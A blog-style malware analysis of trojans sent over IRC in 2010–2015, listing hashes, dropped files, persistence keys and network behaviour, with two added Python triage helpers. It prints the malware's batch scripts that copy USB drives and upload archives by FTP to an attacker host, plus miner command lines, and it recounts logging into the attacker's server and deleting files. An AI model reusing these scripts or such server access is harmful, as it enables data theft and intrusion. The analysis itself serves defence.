Trojans transferred via IRC | Joachim De Zutter
Malware #1: Credentials stealer
IRC DCC Send From 216.249.71.66 (20/09/2010)
CTCP VERSION mIRC v6.35 Khaled Mardam-Bey
Filename: DCS0039.SCR zipped in DCS0039.ZIP
Filesize: 762509
MD5: 4977cc3ab9a7168332e65de67fd73b86
SHA1: c8fcebc53848a71a2088e1ec06aab557c6a7669f
SHA256: 8a641f680bd6300686bb29d2b100745912e26905cac6cd65cfe0ba76e7231c41
Undetected by AVG, appears to be programmed in .NET C#

When the .NET Framework is not installed, the binary gives the error message:
"Application failed to initialize properly (0xc00000135)."

The malware creates the following files:

Filename: %WINDIR%/Temp/mspass.exe
Filesize: 372301
MD5: 25c1640e67bd102784b4a9928fd93db2

Filename: %WINDIR%/Temp/WinAV.exe
Filesize: 762509
MD5: 4977cc3ab9a7168332e65de67fd73b86

Filename: %WINDIR%/Temp/Chromepass.exe
Filesize: 435277
MD5: 4dd8c672a575629e48b0b50149951850

Filename: %WINDIR%/Temp/FF.exe
Filesize: 33792
MD5: 81fc5a1836cc2af4dc7bdf8bd191844b

Filename: %WINDIR%/Temp/iepv.exe
Filesize: 350797
MD5: 97f938d35698fe9cd5b84b257ed4d7df

Filename: %WINDIR%/Temp/tmpinfo.txt
Filesize: around 6068 bytes

Filename: %WINDIR%/Temp/CD KEYS.txt
Filesize: 4499
MD5: 1607689572e89258ef72c1cbf155b55a

Filename: %WINDIR%/Temp/Chrome.txt
Filesize: 2

Filename: %WINDIR%/Temp/Firepass.txt
Filesize: 0

Filename: %WINDIR%/Temp/IE.txt
Filesize: 0

Filename: %WINDIR%/Temp/mess.txt
Filesize: 0

The Windows program %WINDIR%\SYSTEM32\systeminfo.exe is executed to collect information about the victim.
The malware sends an e-mail via smtp.gmail.com over TLS on TCP port 587.
For this, the Schannel security package (schannel.dll) is loaded, which creates the SSL client credentials.
According to the Schannel event log:
An SSL client handshake completed successfully. The negotiated cryptographic parameters are as follows.

Protocol: TLS (SSL 3.1)
Cipher: RC4
Cipher strength: 128
MAC: MD5
Exchange: RSA
Exchange strength: 1024
SECUR32!EncryptMessage is used to encrypt the TLS traffic, which contains the Base64-encoded mail address of the attacker (owned78347762@gmail.com):

AUTH login b3duZWQ3ODM0Nzc2MkBnbWFpbC5jb20=
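Added example (not part of the original analysis): a small Python helper that recovers the AUTH LOGIN username from a plaintext SMTP capture, such as the data seen before encryption by hooking EncryptMessage. The embedded session is constructed from the AUTH line above; the password line is a made-up placeholder, not a value from the sample.

```python
import base64
import binascii
import re

# Constructed capture of the exfiltration session described above ("C:" client,
# "S:" server). The username is the one carried in the sample's AUTH login line;
# the password line is a made-up placeholder, not a value from the malware.
SAMPLE_SESSION = """\
C: EHLO victim
C: AUTH login b3duZWQ3ODM0Nzc2MkBnbWFpbC5jb20=
S: 334 UGFzc3dvcmQ6
C: Y29uc3RydWN0ZWQtcGxhY2Vob2xkZXI=
S: 235 2.7.0 Accepted
"""

_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def _b64_text(token):
    """Decode one base64 token to text; None if it is not valid base64."""
    if not _B64.match(token):
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def extract_auth_login(session):
    """Recover the AUTH LOGIN username from a decrypted SMTP capture, in both the
    inline form this sample uses ("AUTH login <b64 user>") and the two-step form
    (AUTH LOGIN, then user after 334 VXNlcm5hbWU6, password after 334 UGFzc3dvcmQ6).
    The password is only flagged as seen, never decoded into the result."""
    result = {"username": None, "password_seen": False}
    expect = None  # which credential the next client line should carry
    for line in session.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] != "C:":
            continue
        cmd = parts[1:]
        if cmd[0].upper() == "AUTH" and len(cmd) >= 2 and cmd[1].upper() == "LOGIN":
            if len(cmd) == 3:            # username supplied on the AUTH line itself
                result["username"] = _b64_text(cmd[2])
            expect = "password" if len(cmd) == 3 else "username"
        elif expect == "username":
            result["username"] = _b64_text(cmd[0])
            expect = "password"
        elif expect == "password":
            result["password_seen"] = _b64_text(cmd[0]) is not None
            expect = None
    return result
```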

The malware performs a GET request for /automation/n09230945.asp on www.whatismyip.com.
A startup key is created:
"HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/Windows Update" = "C:\Windows\temp\WinAV.exe"

http://www.utrace.de/?query=216.249.71.66
Provider: Smithville Digital, LLC
Organisation: Smithville Telephone Company DSL
Region: Bloomington (US)


Malware #2
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 163840
MD5: ed9318fc2a606a922b807f2f25fc4a93
SHA1: c92e7913a7789d5235a033f64a5c2730ad2d0acb
SHA256: 75f1c536c6fa1558c7fe641ba1c9a0ec20c13a15d2993614dd9361a26786e2b2

Malware #3
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 114688
MD5: 40145c9c4dffc99c409191b363db3463
SHA1: 70e7ee04625b6770501bd6f90fc906f29dfd0ff2
SHA256: 150ab624e61da6e886170cc0f3c7d730e7740dac4d1d00bd6e4a931bb3977eef

Malware #4
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DSC0029.SCR zipped in DCS0029.ZIP
Filesize: 442368
MD5: 125db832916711c81cdb6209724b912f
SHA1: cff02e859c5704864265877e1969a92d5931847e
SHA256: d9a3ccdb977d70dfca1c6f3ca6737e21f667cb4f6a0273ea02b6a137cf9b5996

A DNS lookup was performed for gamersplus.zapto.org, which resolved to 216.249.92.71.
A TCP connection was established to port 1960 on 216.249.92.71.

Malware #5
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 413184
MD5: 74e3f8206bcd8ec52275594e9b0c3a03
SHA1: b87219bcf19f60374b9f8dbde334918336b346d7
SHA256: 52e16e44bff3d8cef2474359990994c77a3640587dbba21d9d4367a247253b33

Malware #6
IRC DCC Send From 216.249.92.71 (06/01/2012)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 648192
MD5: 5f0365ab01c02b095f89a3d1f73601d2
SHA1: 574d880e02e2b78d8459df91797352f98b5e3ad5
SHA256: f903d673908f386d588a456883c1722ceba3a03824430877c370e1996d395e4b

Creates and displays an image.
Filename: DCS0029.jpg
Filesize: 443069
MD5: 58a7c46a0d56c12efdafc92e0e3bcf3f
SHA1: 94ce79d8b1bd5ef39597d8ad6a87db1e19ada091
SHA256: 55ce1fd1b55666a14e250ffb923449556c17752b7a403ef691dd5bbf872a9ac8

Files 7z.exe and 7z.dll were created.
A file Personal.bat (37195 bytes) was created under the directory "Local Settings\Temp\1.tmp\" in the current user's home directory; it contains the strings "Night Arrow 2.0 USB Forensics" and "by DieP0ser@hotmail.com" and ends with:
echo 123 >> up
echo 123 >> up
echo put %computername%.7z >> up
echo rename %computername%.7z %computername%.%random%.7z >> up
echo quit >> up
ftp -s:up && echo System Pwnt. >> %userprofile%\DieP0ser_Was_Here.txt" goto :ftp
The *.bat file creates a file %COMPUTERNAME%.7z and transfers it with the Windows FTP client to gamersplus.zapto.org, which resolved to 216.249.92.71. The banner returned by the FTP server was: "220 Serv-U FTP Server v11.1 ready".

The file "DieP0ser_Was_Here.txt" was created by CMD.EXE containing the text "Nigga yo been hacked!"

By logging into the FTP server the following files were found:
BENDIDDY-PC.7z 131938 KB 6/01/2012 14:26:00
BR10PC07.31276.7z 17105 KB 6/01/2012 17:50:00
COMPUTERNAME.7z 7/01/2012 10:00:00
PERSONAL.13455.7z 31 KB 7/01/2012 2:25:00
YOUR-27E1513D96.7z 4532 KB 7/01/2012 10:39:00
YOUR-27E1513D96.19353.7z 5524 KB 7/01/2012 10:08:00

Since the FTP user account the *.bat file on my machine logged in with was granted the privilege to delete files, the *.7z file that might have contained personal information originating from the virtual machine was successfully deleted on the FTP server.

The FTP server also hosted a file named "Rename.BAT" containing:
rename *.7z *%random%.7z
The server also hosted a file named svchost32.exe:
Filesize: 22016
MD5: f8432f39160cd578fe5d1bf0c47f818e
SHA1: 2a007b69a39d2e89f4cc94871244119a32c843c0
SHA256: 9bbde5541910ffed1f58084b3ffa2cdeb251578c1d0fe55352e2583cc568c999

The executable drops a batch file:
Filename: C:\Documents and Settings\%USERNAME%\Local Settings\Temp\5.tmp\hook.bat
Filesize: 788
MD5: e9ba440098e05ac3b70f09f405e524ad
SHA1: 8d20c74f59cb358590830edbcd765294a97d0149
SHA256: 5c7e96ff6eb3233c215a7678d17254c7465a1b3496be6056591860ec28b40b95

The batch file performs the following commands:
reg add HKLM\SOFTWARE\Microsoft\Windows\Current\VersionRun /v 
WindowsUpdate /t REG_SZ /d C:\svchost32.exe
:usb
mkdir %appdata%\Smoogle
for %%i in (E F G H I J K L M N O P Q R S T U V W X Y Z) do If exist %%i:\*.* copy /Y %%i:\* %appdata%\smoogle\
if exist %appdata%\smoogle\*.* 7z.exe a -y -t7z %computername%USB%%i.7z 
%appdata%\smoogle\*
if exist %%i:/javaupdatelog.txt goto :loop
echo open gamersplus.zapto.org >> up
attrib +h *.*
echo 123 >> up
echo 123 >> up
echo put %computername%USB%%i.7z >> up
echo rename %computername%USB%%i.7z %computername%USB%%i.%random%.7z >> up
echo quit >> up
ftp -s:up 
echo Pwnt. >> %%i:/javaupdatelog.txt
attrib +r +a +s +h %%i:/javaupdatelog.txt
del %computername%USB%%i.7z
goto :loop

:loop
ping -n 1800 127.0.0.1 >nul 
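Added example (not the page's or the malware's code): a Python triage routine for droppers of this kind that pulls the Run-key persistence out of reg add and reassembles the FTP control script a batch builds with echo ... >> up before calling ftp -s:up, the pattern shared by hook.bat and Personal.bat. The embedded input is an excerpt of hook.bat as transcribed above, with the wrapped reg add command rejoined.

```python
import re

# Excerpt of the dropped hook.bat as transcribed on the page (the wrapped reg add
# command rejoined); constructed sample input for the triage function below.
HOOK_BAT = r"""reg add HKLM\SOFTWARE\Microsoft\Windows\Current\VersionRun /v WindowsUpdate /t REG_SZ /d C:\svchost32.exe
:usb
mkdir %appdata%\Smoogle
echo open gamersplus.zapto.org >> up
attrib +h *.*
echo 123 >> up
echo 123 >> up
echo put %computername%USB%%i.7z >> up
echo rename %computername%USB%%i.7z %computername%USB%%i.%random%.7z >> up
echo quit >> up
ftp -s:up
del %computername%USB%%i.7z
"""

REG_ADD = re.compile(r"^reg\s+add\s+(\S+)\s+/v\s+(\S+).*?/d\s+(\S+)", re.I)
ECHO_APPEND = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$", re.I)
FTP_SCRIPT = re.compile(r"^ftp\s+(?:.*\s)?-s:(\S+)", re.I)

def triage_batch(text):
    """Static triage of a dropper .bat: collect Run-key persistence and rebuild any
    FTP control script the batch assembles line by line with 'echo ... >> file'
    before running 'ftp -s:file'."""
    staged = {}  # staged script file name -> lines echoed into it
    report = {"persistence": [], "ftp_scripts": []}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := REG_ADD.match(line)):
            key, name, value = m.groups()
            report["persistence"].append({"key": key, "name": name, "value": value})
        elif (m := ECHO_APPEND.match(line)):
            staged.setdefault(m.group(2).lower(), []).append(m.group(1))
        elif (m := FTP_SCRIPT.match(line)):
            script = staged.get(m.group(1).lower(), [])
            host = next((s.split(None, 1)[1] for s in script
                         if s.lower().startswith("open ")), None)
            uploads = [s.split(None, 1)[1] for s in script if s.lower().startswith("put ")]
            # After 'open', the next two script lines answer the user and password prompts.
            creds_inline = len(script) >= 3 and script[0].lower().startswith("open ")
            report["ftp_scripts"].append({"script": m.group(1), "host": host,
                                          "uploads": uploads, "inline_credentials": creds_inline})
    return report
```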

http://www.utrace.de/?query=216.249.92.71
Provider: Smithville Digital, LLC
Organisation: Smithville Telephone Company DSL
Region: Bloomington (US)


Executable #7
Filename: DCS0029.scr
Filesize: 220160
MD5: 5208a5f69f7257f86e1a0202af546cfc
SHA1: 25ff91c7d62c3e6ba53822183514d69e50efaad0
SHA256: 8e908ee730041ab9ccefa342e01c85a8e58b089d61237d15eba1c73f0ffde8b1
Appears to be packed with UPX. Undetected by any AV at the time of discovery. Sent by 216.249.92.71 (09/02/2012), p0f v2 passive OS fingerprint:

Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) -> 216.249.92.71:4917 (distance 0, link: ethernet/modem)

The executable silently creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which tries to install a Bitcoin Plus miner under %appdata%/mine/; the miner uses the victim's CPU for the benefit of the Bitcoin Plus Miner account with ID 9218856.

Filename: miner.bat
Filesize: 1105
MD5: 253c7eec3d97339352f98fb1821ff5cb
SHA1: 3833a83b1e32c609b8e2d001a0251b46f4c48289
SHA256: 00603874c6aad684ab007319fda61389284b9cb0d73ccc490460aa30e4aa8c60

Executable #8
Filename: DCS0029.scr
Filesize: 548864
MD5: af3c424e933c0b41b8d5f2ea3712513b
SHA1: 5049f7b760b563c3ae298bc4beed6f27e88d40c0
SHA256: ff56bfde8581d8a9cfbcaf3853bf7be4b816568d2d9e24d0a61b70575efa240b
https://www.virustotal.com/file/ff56bfde8581d8a9cfbcaf3853bf7be4b816568d2d9e24d0a61b70575efa240b/analysis/

Creates the files svchost.exe and system.exe.

DCS0029.scr also silently creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which moves system.exe and svchost.exe to %appdata% and creates a startup key for system.exe under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run named "Windows Update".

Filename: svchost.exe
Filesize: 914432
MD5: d35beaa5a86bed3b94d99a44c90f1474
SHA1: bf0ac966dfabfc1d261b3b056bd46c134d781d94
SHA256: b160cfcf5cc5dde178c331b09e05ab64c247fd58c3b409c2a1c8b0f8566f9000
https://www.virustotal.com/file/b160cfcf5cc5dde178c331b09e05ab64c247fd58c3b409c2a1c8b0f8566f9000/analysis/

Filename: system.exe
Filesize: 106496
MD5: 7673136bcb1aaef86f19a26d10182ce8
SHA1: 60395567c30225ce5a6cacecbb904949015bfd1f
SHA256: d0e64f44d9d6e8114b0085921e16a192a6e375d7f3a8aaa4e43c8b4d69e5ed75
https://www.virustotal.com/file/d0e64f44d9d6e8114b0085921e16a192a6e375d7f3a8aaa4e43c8b4d69e5ed75/analysis/

system.exe creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which contains the following command:

%appdata%\svchost.exe -a 5 -o http://pit.deepbit.net:8332 -u andrewsalestech@hotmail.com_Generat -p 123qwerty

Executable #9
Filename: DCS0029.exe
Filesize: 481280
MD5: 83e70851f684d13e2795c0c103ca6b10
SHA1: ed99b0563b56c28570bcd30d84aabb48206f1096
SHA256: 5926877ace33a137f0060335f0d8ec06d1e836572f15ffe0924645f2fcd65016

Creates the svchost.exe file with MD5 d35beaa5a86bed3b94d99a44c90f1474 (see above) and system.exe.

Filename: system.exe
Filesize: 21504
MD5: a3afd3ef222282727881b2e2ca7e1c5c
SHA1: 847b48fa83d292cc1ef52690383e25e002b27646
SHA256: eb35c1f550e5e2f916a22b43689387b523fa1cbdf8404bb9b3e4ddfd91846b8a
https://www.virustotal.com/file/eb35c1f550e5e2f916a22b43689387b523fa1cbdf8404bb9b3e4ddfd91846b8a/analysis/

system.exe creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which contains the following command:

%appdata%\svchost.exe -a 5 -o http://pit.deepbit.net:8332 -u andrewsalestech@hotmail.com_friends -p 123qwerty

The bot sending the trojan executables responds to "diep0ser" (case insensitive) with: "DieP0ser Pwns Meh..". The bot was logged in on Undernet with the username Cutie420.

File #10
IRC DCC Send From 216.249.71.144 (06/11/2015)
/CTCP ... VERSION
VERSION mIRC v6.34 Khaled Mardam-Bey
/CTCP ... TIME
TIME Fri Nov 06 10:27:12 2015
/CTCP ... FINGER
FINGER Pam (Nononono) Idle 6467 seconds (hands off fucker)
Quit message: i am is who i am but what i am is the question

Filename: DCS0029.zip
Filesize: 861728
MD5: f57a96a7a6df31053498295d2c1f4e9a
SHA1: 5f0c96b2ca0d196a08458e32af4d452cb1463e96
SHA256: 8b2ed4a3fa613cb6ede27690c701cbcc79bd0ffbdb5783dbff0bf8eb85c653e9

DCS0029.zip contains DCS0029.scr

Filename: DCS0029.scr
Filesize: 974336
MD5: 5bc25a0556948df7f5e3268a1749a4d6
SHA1: 04803387cee4556a79c0da5262d69640ebf41556
SHA256: b50d2cf7bb1ea9cd39590f0d591658e0af53a95ed3f9cd517901d1d44427446e

a9cd39590f0d591658e0af53a95ed3f9cd517901d1d44427446e/analysis/